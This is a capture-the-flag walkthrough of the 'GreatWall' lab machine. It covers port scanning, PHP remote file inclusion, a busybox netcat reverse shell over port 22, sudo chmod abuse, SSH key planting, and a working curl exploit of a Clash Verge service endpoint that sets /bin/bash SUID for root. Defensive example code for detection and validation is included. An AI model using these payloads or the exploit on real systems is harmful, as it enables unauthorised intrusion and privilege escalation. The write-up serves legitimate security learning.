Temp-GreatWall-Walkthrough
By 城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.175 00:0c:29:94:3a:48 VMware, Inc.
192.168.60.254 00:50:56:ef:e4:ce VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.094 seconds (122.25 hosts/sec). 4 responded
export ip=192.168.60.175
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.175:22
Open 192.168.60.175:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-11 20:56 CST
Initiating ARP Ping Scan at 20:56
Scanning 192.168.60.175 [1 port]
Completed ARP Ping Scan at 20:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:56
Completed Parallel DNS resolution of 1 host. at 20:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:56
Scanning 192.168.60.175 [2 ports]
Discovered open port 80/tcp on 192.168.60.175
Discovered open port 22/tcp on 192.168.60.175
Completed SYN Stealth Scan at 20:56, 0.09s elapsed (2 total ports)
Nmap scan report for 192.168.60.175
Host is up, received arp-response (0.00038s latency).
Scanned at 2025-05-11 20:56:12 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:94:3A:48 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
Raw packets sent: 3 (116B) | Rcvd: 20 (4.230KB)

Directory enumeration turns up only index.php.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.175
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 3193]
Progress: 4811029 / 6369165 (75.54%)

Visit it in the browser.

It shows: "Across the Great Wall we can reach every corner in the world."

Hahaha 🤣, behind the GFW the domestic internet is just one giant LAN.

LFI/RFI File Inclusion

I suspected a file read (local file inclusion) might exist.

That reveals the user wall.

image

Besides that, remote file inclusion is also possible.

image

tail -f /var/log/nginx/access.log
192.168.60.175 - - [11/May/2025:21:54:36 +0800] "GET / HTTP/1.1" 200 2483 "-" "-"

Create a PHP file:

echo "<?php phpinfo() ?>"|sudo tee /var/www/html/a.php
<?php phpinfo() ?>

Checking the phpinfo output shows that URLs are permitted when including files (allow_url_include is on).

image
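As an added example (not from the original post), here is a detector for the two patterns this section relies on, run over constructed nginx access.log lines in the same combined format as the excerpt above: a `page=` value that is a remote URL (RFI) or that traverses to an absolute path (LFI). The parameter name `page`, the wrapper list and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# nginx "combined" format, the same layout as the access.log line shown above
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")   # remote include via allow_url_include
PHP_WRAPPERS = ("php://", "data:")                   # stream wrappers, also worth flagging

def classify_include(value):
    """Label a value passed to an include-style parameter; None means it looks benign."""
    v = unquote(value).lower()          # parse_qs decoded once; this catches double-encoding
    if v.startswith(REMOTE_SCHEMES):
        return "RFI"
    if v.startswith(PHP_WRAPPERS):
        return "php-wrapper"
    if "../" in v or v.startswith("/"):
        return "LFI"
    return None

def scan_access_log(lines, params=("page",)):
    """Return one finding per suspicious include parameter value seen in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a combined-format line; skip it
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                kind = classify_include(value)
                if kind:
                    findings.append({"src": m["src"], "time": m["ts"], "param": name,
                                     "value": value, "kind": kind, "status": int(m["status"])})
    return findings

# Constructed sample lines (not the post's log); only the first request is benign
SAMPLE_LOG = """\
192.168.60.50 - - [11/May/2025:21:50:01 +0800] "GET /?page=about HTTP/1.1" 200 3193 "-" "curl/7.88.1"
192.168.60.50 - - [11/May/2025:21:51:12 +0800] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 1402 "-" "curl/7.88.1"
192.168.60.50 - - [11/May/2025:21:54:36 +0800] "GET /?page=http://192.168.60.100/a.php HTTP/1.1" 200 2483 "-" "-"
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['src']} {f['kind']:<11} {f['param']}={f['value']} -> {f['status']}")
```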

Oddly, commands clearly execute, but the reverse shell just won't connect back.

I tried pinging Kali; it timed out with 100% packet loss.

cat /var/www/html/a.php
<?php
$exec = `ping -c 2 192.168.60.100`;
echo "返回结果:" . trim($exec);
?>

image

However, when I tried to remotely include google I got an amusing response.

Gulugulu hahaha, a strong curry flavour.

image

Most likely iptables is configured to block outbound traffic.

So use port 22, which is already open, and bounce the shell back over that port.

cat /var/www/html/a.php
<?php
$exec = `busybox nc 192.168.60.100 22 -e /bin/bash`;
echo "返回结果:" . trim($exec);
?>
❯ curl -s "http://192.168.60.178/?page=http://192.168.60.100/a.php"

User Privilege Escalation

Listen on the port and, sure enough, the shell comes back 😅

❯ penelope.py 22
[+] Listening for reverse shells on 0.0.0.0:22 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from greatwall-192.168.60.178-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/greatwall~192.168.60.178_Linux_x86_64/2025_05_11-23_14_55-664.log 📜
──────────────────────────────────────────────────────────────────────────
www-data@greatwall:~/html$

www-data has a sudo entry that lets it run chmod as the user wall.

Just chmod the home directory to 777, so every user can read, write and execute it.

www-data@greatwall:/tmp$ sudo -l
Matching Defaults entries for www-data on greatwall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on greatwall:
(wall) NOPASSWD: /bin/chmod

www-data@greatwall:/tmp$ sudo -u wall chmod -R 777 /home/wall/
www-data@greatwall:/tmp$ ls -al /home/wall/
total 32
drwxrwxrwx 4 wall wall 4096 May 11 02:41 .
drwxr-xr-x 3 root root 4096 May 10 18:54 ..
lrwxrwxrwx 1 root root 9 May 11 00:15 .bash_history -> /dev/null
-rwxrwxrwx 1 wall wall 220 May 10 18:54 .bash_logout
-rwxrwxrwx 1 wall wall 3526 May 10 18:54 .bashrc
drwxrwxrwx 3 wall wall 4096 May 11 00:18 .local
-rwxrwxrwx 1 wall wall 807 May 10 18:54 .profile
drwxrwxrwx 2 wall wall 4096 May 11 02:41 .ssh
-rwxrwxrwx 1 wall wall 1808 May 11 00:25 user.flag
www-data@greatwall:/tmp$ cd /home/wall/
www-data@greatwall:/home/wall$ cat user.flag
.'.
.':ldd.
.,:oddddd:
.,cdddddddddd
.,cddddddddddddd:
.;lddddddddddddddddd.
.;lddddddddddddddddddddl
.,cddddddddddddccoddddddddd.
.;cdddddddddddddl,.:ddddddddddc
.';lddddddddddddddo;. ,dddddddddddd.
.':lddddddddddddddddc. 'oddddddddddddc
.':odddddddddddddddddl, .cdddddddddddddd.
.':oddddddddddddddddddd:. ;dddddddddddddddo
';lddddddddddddddddddddl, 'odddddddddddddddd'
..,:lodddddddddddddo;. .cdddddddddddddddddl
..';codddddc. .:ddddddddddddddddddd.
..' ,ddddddddddddddddddddc
;ldddddddddddddddddddd.
..';clddddddddddddc
..,:loddddd.
.c:,.. ..',:
'ddddd'
'dddl.
,dd,
;o.
.

flag{b088764475fa2a0a962fb9154f41c5b6}

Try writing a rev.sh and giving it the SUID bit.

But the file isn't owned by wall, so chmod as wall isn't permitted.

www-data@greatwall:/home/wall$ echo "busybox nc 192.168.60.100 22 -e /bin/bash">rev.sh
www-data@greatwall:/home/wall$ sudo -u wall chmod 6777 rev.sh
chmod: changing permissions of 'rev.sh': Operation not permitted

So go the SSH route instead and write a public key in.

www-data@greatwall:/home/wall/.ssh$ echo "ssh-rsa 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 Pepster@primary">authorized_keys

Then set the .ssh permissions back.

www-data@greatwall:/home/wall/.ssh$ sudo -u wall chmod 600 id_rsa
www-data@greatwall:/home/wall/.ssh$ sudo -u wall chmod 644 authorized_keys
www-data@greatwall:/home/wall/.ssh$ sudo -u wall chmod 644 id_rsa.pub
www-data@greatwall:/home/wall/.ssh$ cd ..
www-data@greatwall:/home/wall$ sudo -u wall chmod 700 .ssh/
www-data@greatwall:/home/wall$ sudo -u wall chmod 750 /home/wall/

Root Privilege Escalation

Try logging in over SSH.

❯ ssh wall@$ip -i ../.ssh/id_rsa
Linux greatwall 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64

Last login: Sun May 11 03:48:42 2025 from 192.168.11.2
wall@greatwall:~$

This shows that the user wall also has sudo rights:

it can start clash-verge-service.

wall@greatwall:~$ sudo -l
Matching Defaults entries for wall on greatwall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User wall may run the following commands on greatwall:
(ALL) NOPASSWD: /usr/bin/systemctl start clash-verge-service

Hey, isn't this the Clash vulnerability that was disclosed earlier?

[BUG] Clash Verge has a privilege escalation vulnerability · Issue #3428 · clash-verge-rev/clash-verge-rev

image

However, I couldn't find a PoC or reproduction steps 😅

It was only fixed today, though 🤣

image

I tried starting the service directly and found that it opens local port 33211.

wall@greatwall:~$ sudo /usr/bin/systemctl start clash-verge-service
wall@greatwall:~$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:33211 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*

I tried viewing the help, but there's no GUI support.

wall@greatwall:~$ clash-verge --help

thread 'main' panicked at /home/runner/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/tao-0.32.8/src/platform_impl/linux/event_loop.rs:212:53:
Failed to initialize gtk backend!: BoolError { message: "Failed to initialize GTK", filename: "/home/runner/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/gtk-0.18.2/src/rt.rs", function: "gtk::rt::init", line: 141 }
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Aborted

I tried forwarding the port with socat, but got permission denied 😅. I'd forgotten about the port restriction: only ports 80 and 22 can go outbound.

wall@greatwall:/tmp$ wget 192.168.60.100/socat
--2025-05-12 00:07:38-- http://192.168.60.100/socat
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat 100%[=======================================================================>] 366.38K --.-KB/s in 0.005s

2025-05-12 00:07:38 (68.3 MB/s) - ‘socat’ saved [375176/375176]

wall@greatwall:/tmp$ chmod +x socat
wall@greatwall:/tmp$ ./socat TCP-LISTEN:80,fork TCP4:127.0.0.1:33211
2025/05/12 00:10:18 socat[1622] E bind(5, {AF=2 0.0.0.0:80}, 16): Permission denied

I tried using this port as a proxy to reach the local web service.

wall@greatwall:/tmp$ curl 127.0.0.1 --proxy 127.0.0.1:33211
HTTP method not allowed

Reaching Kali's HTTP service through it gives the same Method Not Allowed.

wall@greatwall:/tmp$ curl http://192.168.60.100 --proxy http://127.0.0.1:33211 -v
* Trying 127.0.0.1:33211...
* Connected to 127.0.0.1 (127.0.0.1) port 33211 (#0)
> GET http://192.168.60.100/ HTTP/1.1
> Host: 192.168.60.100
> User-Agent: curl/7.88.1
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 405 Method Not Allowed
< content-type: text/plain; charset=utf-8
< content-length: 23
< date: Sun, 11 May 2025 16:19:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact

Connect with nc.

wall@greatwall:/tmp$ nc -vn 127.0.0.1 33211
(UNKNOWN) [127.0.0.1] 33211 (?) open
aaa
HTTP/1.1 400 Bad Request
content-length: 0
date: Sun, 11 May 2025 16:20:46 GMT

Fortunately I found a relevant exploit PoC on a WeChat official account.

Protect Clash Verge rev now! Remote command execution vulnerability made public!

Clash Verge Vulnerability Reproduction

I constructed the following PoC, which achieves privilege escalation.

wall@greatwall:/tmp$ cat rev.sh
#!/bin/bash
chmod +s /bin/bash
wall@greatwall:/tmp$ curl -X POST http://127.0.0.1:33211/start_clash \
-H "Content-Type: application/json" \
-d '{
"core_type": "verge-mihome",
"bin_path": "/tmp/rev.sh",
"config_dir": "1",
"config_file": "/tmp/rev.sh",
"log_file": "/tmp/abc"
}'
{"code":0,"msg":"ok","data":null}
wall@greatwall:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Mar 30 2024 /bin/bash
wall@greatwall:/tmp$ bash -p
bash-5.2# id
uid=1000(wall) gid=1000(wall) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1000(wall)
bash-5.2# whoami
root
bash-5.2# cat /root/r007.7x7oZzZzZzzzz
,'. ,',
,''',. .,'',
,'''''' .'''''.
.''''''''............''''''';
;''''''''''''''''''''''''''''
''''''''''''''''''''''''''''',
....'''''''''''''''''''''''...,
,.....;xkl'...........'dkd,.....
,.....OMMM;...........cMMMd.....
.......'cl,.............;l:.....;
'.............':cc:,.............
,.................................
.................................,
...................................
....................................
.... ,..................................'
... ...................................,
,.. .....................................
...' ......................................
.... '.....................................
.........................................'

flag{b3d2a9f34869484b74db97411cf1eb3b}

Postscript

If you look at its log, you can see it assembles the command in the following format:

wall@greatwall:/tmp$ cat abc
Spawning process: /tmp/rev.sh -d 1 -f /tmp/rev.sh

So the trailing -d and -f arguments don't actually need values.

root@greatwall:/tmp# chmod -s /bin/bash
wall@greatwall:/tmp$ curl -X POST http://127.0.0.1:33211/start_clash \
-H "Content-Type: application/json" \
-d '{
"core_type": "verge-mihome",
"bin_path": "/tmp/rev.sh",
"config_dir": "",
"config_file": "",
"log_file": "/tmp/abc"
}'
{"code":0,"msg":"ok","data":null}
wall@greatwall:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Mar 30 2024 /bin/bash
wall@greatwall:/tmp$ cat abc
Spawning process: /tmp/rev.sh -d -f
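As an added example (not the project's code and not its actual fix), here is the check a root-privileged service like this one should make before spawning whatever `bin_path` names, given the request shape of the PoC and the spawn log above: the binary must resolve into one fixed core directory, carry the file name expected for its `core_type`, and be a regular file owned by a trusted uid that nobody else can write. `core_dir`, `allowed_cores` and `trusted_uids` are assumptions for illustration; the `core_type` string is the one used in the post's request.

```python
import os
import stat
import tempfile

def validate_start_request(req, core_dir, allowed_cores, trusted_uids=(0,)):
    """Return (True, "ok") if the /start_clash body may be spawned as root, else (False, why).
    core_dir: only directory a core may live in; allowed_cores: core_type -> file name there;
    trusted_uids: owners whose binaries are trusted (root by default). All three are assumptions."""
    core_type = req.get("core_type")
    if core_type not in allowed_cores:
        return False, f"unknown core_type {core_type!r}"
    root = os.path.realpath(core_dir)
    path = os.path.realpath(str(req.get("bin_path", "")))   # resolve symlinks before checking
    if os.path.dirname(path) != root:
        return False, f"bin_path {path} is outside {root}"
    if os.path.basename(path) != allowed_cores[core_type]:
        return False, "bin_path does not name the binary for this core_type"
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False, "bin_path does not exist"
    if not stat.S_ISREG(st.st_mode):
        return False, "bin_path is not a regular file"
    if st.st_uid not in trusted_uids:
        return False, f"bin_path is owned by uid {st.st_uid}, not a trusted uid"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False, "bin_path is group- or world-writable"
    if not st.st_mode & stat.S_IXUSR:
        return False, "bin_path is not executable"
    return True, "ok"

def demo():
    """Constructed scenario: a trusted core dir holding one binary, then the post's /tmp path."""
    core_dir = tempfile.mkdtemp()
    good = os.path.join(core_dir, "verge-mihome")      # core_type string taken from the post
    open(good, "w").close()
    os.chmod(good, 0o755)
    cores = {"verge-mihome": "verge-mihome"}
    me = (os.getuid(),)   # the demo does not run as root, so trust the current uid instead
    accepted = validate_start_request({"core_type": "verge-mihome", "bin_path": good}, core_dir, cores, me)
    rejected = validate_start_request({"core_type": "verge-mihome", "bin_path": "/tmp/rev.sh"}, core_dir, cores, me)
    os.chmod(good, 0o777)   # a writable core binary must be refused as well
    writable = validate_start_request({"core_type": "verge-mihome", "bin_path": good}, core_dir, cores, me)
    return accepted, rejected, writable

if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```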

Also, iptables itself isn't present on the target: it has migrated from iptables to nftables, but keeps iptables compatibility via the netfilter-persistent service.

You can see the iptables configuration file:

root@greatwall:/tmp# cat /etc/iptables/rules.v4
# Generated by iptables-save v1.8.9 (nf_tables) on Sun May 11 02:22:38 2025
*filter
:INPUT DROP [1:48]
:FORWARD DROP [0:0]
:OUTPUT DROP [4:176]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
# Completed on Sun May 11 02:22:38 2025
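As an added example (not from the post), a small evaluator for the rules.v4 above: it parses the *filter table and gives the verdict for a new connection, which shows why the shell over port 22 and the wget over port 80 got out while ping (ICMP) and any other port were dropped, and why 33211 is reachable only over lo. The dump is embedded so it runs offline; the parser assumes every option takes exactly one argument, which holds for this file.

```python
def parse_filter(text):
    """Parse the *filter table of an iptables-save dump into chain policies and rules."""
    policies, rules = {}, []
    for line in text.splitlines():
        if line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif line.startswith("-A "):
            t = line.split()
            opt = {t[i]: t[i + 1] for i in range(2, len(t) - 1, 2)}   # "-p tcp" -> {"-p": "tcp"}
            rules.append({"chain": t[1], "iface": opt.get("-i") or opt.get("-o"),
                          "proto": opt.get("-p"), "dport": int(opt["--dport"]) if "--dport" in opt else None,
                          "ctstate": set(opt["--ctstate"].split(",")) if "--ctstate" in opt else None,
                          "target": opt["-j"]})
    return policies, rules

def verdict(policies, rules, chain, proto, dport=None, iface="eth0", state="NEW"):
    """First matching rule wins, as in iptables; otherwise the chain policy applies."""
    for r in rules:
        if r["chain"] != chain or (r["iface"] and r["iface"] != iface):
            continue
        if (r["proto"] and r["proto"] != proto) or (r["dport"] is not None and r["dport"] != dport):
            continue
        if r["ctstate"] and state not in r["ctstate"]:
            continue
        return r["target"]
    return policies[chain]

RULES_V4 = """\
*filter
:INPUT DROP [1:48]
:FORWARD DROP [0:0]
:OUTPUT DROP [4:176]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
"""

def egress_summary(text):
    """Verdict for a fresh outbound connection per protocol/port: what the host may reach."""
    policies, rules = parse_filter(text)
    probes = {"tcp/22": ("tcp", 22), "tcp/80": ("tcp", 80), "tcp/4444": ("tcp", 4444),
              "udp/53": ("udp", 53), "icmp": ("icmp", None)}
    return {k: verdict(policies, rules, "OUTPUT", p, d) for k, (p, d) in probes.items()}
```

Binding socat to local port 80 as wall fails for a different reason: ports below 1024 need root or CAP_NET_BIND_SERVICE, and these rules only decide which connections are accepted, not which ports a user may listen on.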